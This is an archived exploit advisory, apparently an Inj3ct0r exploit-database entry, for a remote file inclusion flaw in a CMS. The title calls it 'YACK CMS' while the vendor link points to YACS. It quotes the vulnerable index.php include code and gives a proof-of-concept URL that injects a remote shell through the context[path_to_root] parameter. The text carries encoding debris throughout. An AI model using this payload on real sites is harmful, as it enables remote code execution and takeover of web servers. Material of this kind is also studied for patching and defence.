TUCoPS :: Web :: CMS / Portals :: b1a-1525.htm

YACK CMS 10.5.27 Remote File Inclusion Vulnerability
YACK CMS 10.5.27 Remote File Inclusion Vulnerability
YACK CMS 10.5.27 Remote File Inclusion Vulnerability


=====================================================0D
YACK CMS 10.5.27 Remote File Inclusion Vulnerability=0D
=====================================================0D
=0D
=0D
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0=0D
 0     _                   __           __       __                     1=0D
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0=0D
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1=0D
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0=0D
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1=0D
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0=0D
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1=0D
 1                  \ \____/ >> Exploit database separated by exploit   0=0D
 0                   \/___/          type (local, remote, DoS, etc.)    1=0D
 1                                                                      1=0D
 0  [+] Site            : Inj3ct0r.com                                  0=0D
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1=0D
 0                                                                      0=0D
 1                    ########################################          1=0D
 0                    I'm eidelweiss member from Inj3ct0r Team          1=0D
 1                    ########################################          0=0D
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1=0D
=0D
=0D
Vendor: http://www.yacs.fr=0D 
download: http://www.yacs.fr/file-fetch/1238-20100527-yacs-10-5-27.tgz=0D 
Author:     eidelweiss=0D
Contact:    g1xsystem[at]windowslive.com=0D
 =0D
======================================================================0D
 =0D
    -=[ vuln c0de ]=-=0D
 =0D
[!] index.php=0D
 =0D
// load global definitions=0D
if($home = getenv('YACS_HOME'))=0D
    include_once str_replace('//', '/', $home.'/').'shared/global.php'; // <= 0=0D
elseif(is_readable('yacs.home') && is_callable('file_get_contents') && ($content = trim(file_get_contents('yacs.home'), " \t\n\r\0\x0B\\/.")) && is_readable($content.'/shared/global.php'))=0D
    include_once $content.'/shared/global.php'; // <= 1=0D
elseif(is_readable('shared/global.php'))=0D
    include_once 'shared/global.php';=0D
elseif(is_readable('yacs/shared/global.php'))=0D
    include_once 'yacs/shared/global.php';=0D
else=0D
    exit('The file shared/global.php has not been found. Please reinstall or mention home directory in file yacs.home or configure the YACS_HOME environment variable.');=0D
 =0D
// load libraries used in this script=0D
include_once $context['path_to_root'].'feeds/feeds.php'; // some links to newsfeeds=0D
include_once $context['path_to_root'].'links/links.php';    //  <= 2 (i dont give fuck)=0D
 =0D
 =0D
======================================================================0D
 =0D
    -=[ P0C ]=-=0D
 =0D
http://127.0.0.1/path/index.php?context[path_to_root]= [inj3ct0r shell]=0D 
 =0D
    etc , etc , etc=0D
 =0D
======================================================================0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH